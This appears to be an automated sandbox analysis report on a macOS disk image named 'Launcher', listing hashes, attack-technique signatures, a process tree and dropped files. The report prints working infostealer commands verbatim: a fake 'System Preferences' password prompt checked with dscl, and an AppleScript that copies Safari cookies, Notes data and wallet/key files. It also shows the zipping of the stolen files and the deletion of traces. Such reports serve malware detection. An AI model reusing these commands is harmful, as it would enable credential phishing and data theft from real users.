Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
163s -
max time network
134s -
platform
macos-10.15_amd64 -
resource
macos-20240410-en -
resource tags
arch:amd64arch:i386image:macos-20240410-enkernel:19b77alocale:en-usos:macos-10.15-amd64system -
submitted
27/05/2024, 11:03
Static task
static1
General
-
Target
Launcher (1).dmg
-
Size
1006KB
-
MD5
c92da1857605ceb898ee160fbaa34ef9
-
SHA1
ed8b41a86b5ec09c6c3a03a5a43a42a35c2d1ede
-
SHA256
1b61497cc0b24f7a1caef2440986c9a82a2dd83acbe2e99ca6a3287581d742bb
-
SHA512
dfa0b79a09022b86ccda8c9a594576e3d74b383d87da200aaa31bdad4fc65eea248bca6d6e42e78059e78862d10c73676fc2701f67243238141ac82ab74fa2dd
-
SSDEEP
24576:FRex1zkDCG082nYMhLCUa8G7dXiyOrhgbqvpekWO:FERG082nZ4Ua8GJyyOrhgr6
Malware Config
Signatures
-
Queries the macOS version information. 1 TTPs 2 IoCs
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
ioc Process sh -c sw_vers Process not Found sw_vers Process not Found -
System Checks 1 TTPs 2 IoCs
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.
ioc Process sh -c "system_profiler SPHardwareDataType" Process not Found system_profiler SPHardwareDataType Process not Found -
File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur.
-
AppleScript 1 TTPs 8 IoCs
AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.
ioc Process osascript -e "set baseFolderPath to (path to home folder as text) & \"1233546738\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"1233546738:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell" Process not Found sh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'" Process not Found osascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop" Process not Found sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'" Process not Found osascript -e "tell application \"Terminal\" to set visible of front window to false" Process not Found sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'" Process not Found osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer" Process not Found sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"1233546738\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"1233546738:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'" Process not Found -
Resource Forking 1 TTPs 3 IoCs
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.
ioc Process /System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy Process not Found /System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper Process not Found /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper Process not Found
Processes
-
/bin/shsh -c "sudo /bin/zsh -c \"open /Volumes/Launcher\""1⤵PID:598
-
/bin/bashsh -c "sudo /bin/zsh -c \"open /Volumes/Launcher\""1⤵PID:598
-
/usr/bin/sudosudo /bin/zsh -c "open /Volumes/Launcher"1⤵PID:598
-
/bin/zsh/bin/zsh -c "open /Volumes/Launcher"2⤵PID:599
-
-
/usr/bin/openopen /Volumes/Launcher2⤵PID:599
-
-
/usr/libexec/xpcproxyxpcproxy com.apple.spindump1⤵PID:600
-
/usr/sbin/spindump/usr/sbin/spindump1⤵PID:600
-
/usr/libexec/xpcproxyxpcproxy com.apple.tailspind1⤵PID:601
-
/usr/libexec/xpcproxyxpcproxy com.apple.spindump_agent1⤵PID:602
-
/usr/libexec/tailspind/usr/libexec/tailspind1⤵PID:601
-
/usr/libexec/spindump_agent/usr/libexec/spindump_agent1⤵PID:602
-
/usr/libexec/xpcproxyxpcproxy com.apple.security.cloudkeychainproxy31⤵PID:605
-
/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy1⤵PID:605
-
/usr/libexec/xpcproxyxpcproxy com.apple.geod1⤵PID:613
-
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod1⤵PID:613
-
/usr/libexec/xpcproxyxpcproxy com.apple.geod1⤵PID:614
-
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod1⤵PID:614
-
/usr/libexec/xpcproxyxpcproxy com.apple.secinitd1⤵PID:615
-
/usr/libexec/secinitd/usr/libexec/secinitd1⤵PID:615
-
/usr/libexec/xpcproxyxpcproxy com.apple.AddressBook.ContactsAccountsService1⤵PID:617
-
/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService1⤵PID:617
-
/usr/libexec/xpcproxyxpcproxy com.apple.suggestd1⤵PID:618
-
/System/Library/PrivateFrameworks/CoreSuggestions.framework/Versions/A/Support/suggestd/System/Library/PrivateFrameworks/CoreSuggestions.framework/Versions/A/Support/suggestd1⤵PID:618
-
/usr/libexec/xpcproxyxpcproxy com.apple.knowledge-agent1⤵PID:619
-
/usr/libexec/knowledge-agent/usr/libexec/knowledge-agent1⤵PID:619
-
/usr/libexec/xpcproxyxpcproxy com.apple.routined1⤵PID:620
-
/usr/libexec/routined/usr/libexec/routined LAUNCHED_BY_LAUNCHD1⤵PID:620
-
/usr/libexec/xpcproxyxpcproxy com.apple.Maps.mapspushd1⤵PID:621
-
/System/Library/CoreServices/mapspushd/System/Library/CoreServices/mapspushd1⤵PID:621
-
/usr/libexec/xpcproxyxpcproxy com.apple.neagent.878568F8-CCE5-4157-8315-22F20DC8FB0A1⤵PID:625
-
/usr/libexec/neagent/usr/libexec/neagent1⤵PID:625
-
/usr/libexec/xpcproxyxpcproxy com.apple.siri.context.service1⤵PID:627
-
/System/Library/PrivateFrameworks/ContextKit.framework/Versions/A/XPCServices/ContextService.xpc/Contents/MacOS/ContextService/System/Library/PrivateFrameworks/ContextKit.framework/Versions/A/XPCServices/ContextService.xpc/Contents/MacOS/ContextService1⤵PID:627
-
/usr/libexec/xpcproxyxpcproxy com.apple.pbs1⤵PID:628
-
/System/Library/CoreServices/pbs/System/Library/CoreServices/pbs1⤵PID:628
-
/usr/libexec/xpcproxyxpcproxy com.apple.TextInputMenuAgent1⤵PID:629
-
/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent1⤵PID:629
-
/usr/libexec/xpcproxyxpcproxy com.apple.TextInputSwitcher1⤵PID:630
-
/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher1⤵PID:630
-
/usr/libexec/xpcproxyxpcproxy com.apple.quicklook.ui.helper1⤵PID:632
-
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper1⤵PID:632
-
/usr/libexec/xpcproxyxpcproxy com.apple.Terminal.21001⤵PID:633
-
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal1⤵PID:633
-
/usr/bin/loginlogin -pf run2⤵PID:636
-
/bin/zsh-zsh3⤵PID:640
-
/usr/libexec/path_helper/usr/libexec/path_helper -s4⤵PID:642
-
-
/usr/bin/localelocale LC_CTYPE4⤵PID:643
-
-
-
-
/usr/bin/loginlogin -pf run2⤵PID:641
-
/bin/zsh-zsh3⤵PID:644
-
/usr/libexec/path_helper/usr/libexec/path_helper -s4⤵PID:645
-
-
/usr/bin/localelocale LC_CTYPE4⤵PID:646
-
-
/Volumes/Launcher/Launcher/Volumes/Launcher/Launcher4⤵PID:647
-
-
-
-
/usr/libexec/xpcproxyxpcproxy com.apple.metadata.mdwrite1⤵PID:634
-
/usr/libexec/xpcproxyxpcproxy com.apple.audio.systemsoundserverd1⤵PID:637
-
/usr/sbin/systemsoundserverd/usr/sbin/systemsoundserverd1⤵PID:637
-
/usr/libexec/xpcproxyxpcproxy com.apple.AccountPolicyHelper1⤵PID:638
-
/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper1⤵PID:638
-
/usr/libexec/xpcproxyxpcproxy com.apple.audio.AudioComponentRegistrar1⤵PID:639
-
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon1⤵PID:639
-
/bin/shsh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"1⤵PID:648
-
/bin/bashsh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"1⤵PID:648
-
/usr/bin/osascriptosascript -e "tell application \"Terminal\" to set visible of front window to false"1⤵PID:648
-
/bin/shsh -c "mkdir /Users/run/1233546738"1⤵PID:649
-
/bin/bashsh -c "mkdir /Users/run/1233546738"1⤵PID:649
-
/bin/mkdirmkdir /Users/run/12335467381⤵PID:649
-
/bin/shsh -c sw_vers1⤵PID:650
-
/bin/bashsh -c sw_vers1⤵PID:650
-
/usr/bin/sw_verssw_vers1⤵PID:650
-
/bin/shsh -c "system_profiler SPHardwareDataType"1⤵PID:651
-
/bin/bashsh -c "system_profiler SPHardwareDataType"1⤵PID:651
-
/usr/sbin/system_profilersystem_profiler SPHardwareDataType1⤵PID:651
-
/usr/libexec/xpcproxyxpcproxy com.apple.icloud.findmydeviced1⤵PID:653
-
/usr/libexec/findmydeviced/usr/libexec/findmydeviced1⤵PID:653
-
/bin/shsh -c "system_profiler SPDisplaysDataType"1⤵PID:654
-
/bin/bashsh -c "system_profiler SPDisplaysDataType"1⤵PID:654
-
/usr/sbin/system_profilersystem_profiler SPDisplaysDataType1⤵PID:654
-
/bin/shsh -c "dscl /Local/Default -authonly run \"\""1⤵PID:656
-
/bin/bashsh -c "dscl /Local/Default -authonly run \"\""1⤵PID:656
-
/usr/bin/dscldscl /Local/Default -authonly run1⤵PID:656
-
/bin/shsh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"1⤵PID:657
-
/bin/bashsh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"1⤵PID:657
-
/usr/bin/osascriptosascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"1⤵PID:657
-
/bin/shsh -c "dscl /Local/Default -authonly run root"1⤵PID:659
-
/bin/bashsh -c "dscl /Local/Default -authonly run root"1⤵PID:659
-
/usr/bin/dscldscl /Local/Default -authonly run root1⤵PID:659
-
/bin/shsh -c "mkdir -p '/Users/run/1233546738/Chromium/Chrome'"1⤵PID:662
-
/bin/bashsh -c "mkdir -p '/Users/run/1233546738/Chromium/Chrome'"1⤵PID:662
-
/bin/mkdirmkdir -p /Users/run/1233546738/Chromium/Chrome1⤵PID:662
-
/bin/shsh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"1233546738\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"1233546738:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"1⤵PID:663
-
/bin/bashsh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"1233546738\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"1233546738:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"1⤵PID:663
-
/usr/bin/osascriptosascript -e "set baseFolderPath to (path to home folder as text) & \"1233546738\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"1233546738:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell"1⤵PID:663
-
/usr/libexec/xpcproxyxpcproxy com.apple.ReportCrash1⤵PID:669
-
/System/Library/CoreServices/ReportCrash/System/Library/CoreServices/ReportCrash agent1⤵PID:669
-
/usr/libexec/xpcproxyxpcproxy com.apple.ReportMemoryException1⤵PID:670
-
/usr/libexec/ReportMemoryException/usr/libexec/ReportMemoryException1⤵PID:670
-
/usr/libexec/xpcproxyxpcproxy com.apple.DesktopServicesHelper.339E7796-74DC-486F-A8B9-036B039097361⤵PID:672
-
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper1⤵PID:672
-
/bin/shsh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/1233546738 /Users/run/1233546738.zip --norsrc --noextattr"1⤵PID:673
-
/bin/bashsh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/1233546738 /Users/run/1233546738.zip --norsrc --noextattr"1⤵PID:673
-
/usr/bin/dittoditto -c -k --sequesterRsrc --keepParent /Users/run/1233546738 /Users/run/1233546738.zip --norsrc --noextattr1⤵PID:673
-
/usr/libexec/xpcproxyxpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E1⤵PID:677
-
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService1⤵PID:677
-
/bin/shsh -c "rm -rf /Users/run/1233546738"1⤵PID:687
-
/bin/bashsh -c "rm -rf /Users/run/1233546738"1⤵PID:687
-
/bin/rmrm -rf /Users/run/12335467381⤵PID:687
-
/bin/shsh -c "rm /Users/run/1233546738.zip"1⤵PID:688
-
/bin/bashsh -c "rm /Users/run/1233546738.zip"1⤵PID:688
-
/bin/rmrm /Users/run/1233546738.zip1⤵PID:688
-
/bin/shsh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"1⤵PID:689
-
/bin/bashsh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"1⤵PID:689
-
/usr/bin/osascriptosascript -e "display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop"1⤵PID:689
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
90KB
MD54e9060f76c1cb5b54005dc6640a58f0d
SHA104a1e6791ae55612d9b63f23ccb37eec398b3d27
SHA2565b6dd3116e1d3ecbf6d07ecfc03f1537ab00ce91336cc7c6cddda6df0c9984d3
SHA512be921e02bb810fb867c1de3e3c2a9c3b04c84188d6a9eae60b73558bd4748c1451161da8fba2c8e74f225be4b8a6f0e98276fe1e397b0083fcbbd4ebdf32e148
-
Filesize
20KB
MD52a3fa78b5f55b529a2698ad187c80204
SHA1cbbda35512038de511ac23b0aed12e9e86bcc796
SHA256d52ad17cc5096119732f06311ef2e25005c2a00f551c9684e2d655cbc846455b
SHA512e9b113ec0c6a888e059cf625b0bfb128d11a55970fed12df30848c9f836c5f36b2660abb4e2a820e7dedd6f0ead312edec1c6cd645f14091d98b42f696bda9ab
-
Filesize
40KB
MD5b6914d8e5cb470236eceed8d6f8b4fb7
SHA1cdff8880e9fa7630fc8d57af4669365b5ab29b60
SHA25645bda2415419c24d2526ae60cae5ee1d66bc8d2cc986bb9e94c0f3c414af06c1
SHA5121c491cfeb2b883ed20a43e16d7bf620520f4b770c8727ffb83e02554aa6aa54def4732460bcff82014050f7a1fba38e01f5570cacfbfcef6da6f2f795dc56ee7
-
Filesize
1KB
MD531717a21202f4dbab34a72c86ae4f3f2
SHA178fab4a3136000513a8f66f2d81d19cb2473338d
SHA2566e50323737f1ebceb1d9f4e1fb36e5b02ff684de7711f54df08128e966f130da
SHA5124c79b4b4705b897f2e43aec1ad622df2af929fc58a4e7c44d052b2e39c789bb266d4efc150e00896ac530aede6187c60dba572e78ada2b620f2f4e46f0c6cf5c
-
Filesize
104KB
MD5a434d5e7e9a5b967e47c44a75bfd66e1
SHA13fce32466913a348170172100553cb5bd953ef90
SHA256ed641fc991345ae3c0ebeac30c25490f83a9ba7b06aa073d0403f62be4b5f016
SHA512e51663e418f66250c73badc2a9d43f8be5d6ff8e11425046ab6d1792459e6629c49b6ba6eb612eb30bdaec5f102e7260a3107408d3edce0d7dd7f8305ff326e5
-
Filesize
4B
MD563a9f0ea7bb98050796b649e85481845
SHA1dc76e9f0c0006e8f919e0c515c66dbba3982f785
SHA2564813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2
SHA51299adc231b045331e514a516b4b7680f588e3823213abe901738bc3ad67b2f6fcb3c64efb93d18002588d3ccc1a49efbae1ce20cb43df36b38651f11fa75678e8
-
Filesize
124KB
MD52b462e40cd20c9cab2baf9c32eaf0706
SHA1663a9c3970103ad14389e45554d39316746b59b1
SHA2562eb4199a80d0182558ba25439e6c7e7042259ce83d746e6b62efa3ae8f318790
SHA5123d634109433811666f84046ee636393064a5d3b0b443b8f41c7d9c30a37f97da6f929b7f8ce9e7110da9f155e40e58db622a33f6e477d9a48170d5e2378221f0
-
Filesize
179KB
MD59a43af57707d2fb460832049d1f217d1
SHA1056d813f8cb5198ca82072f7e3484f38ea5267f8
SHA2567224f8828694ed74a8353567e4d84da188d15a993a4a75938f8409cb49218e7c
SHA5121f33175f5d0958c79540a627552f71c6960b6ff19c9b2b0aa604c00bfeff216f6ea2ec3a22ef91ad8d7249597fdf5ad49ddbf5f4aef71b397e785152474954d7
-
Filesize
47KB
MD50e4a0d1ceb2af6f0f8d0167ce77be2d3
SHA1414ba4c1dc5fc8bf53d550e296fd6f5ad669918c
SHA256cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030
SHA5121dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20
-
Filesize
4KB
MD5d3a1859e6ec593505cc882e6def48fc8
SHA1f8e6728e3e9de477a75706faa95cead9ce13cb32
SHA2563ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c
SHA512ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818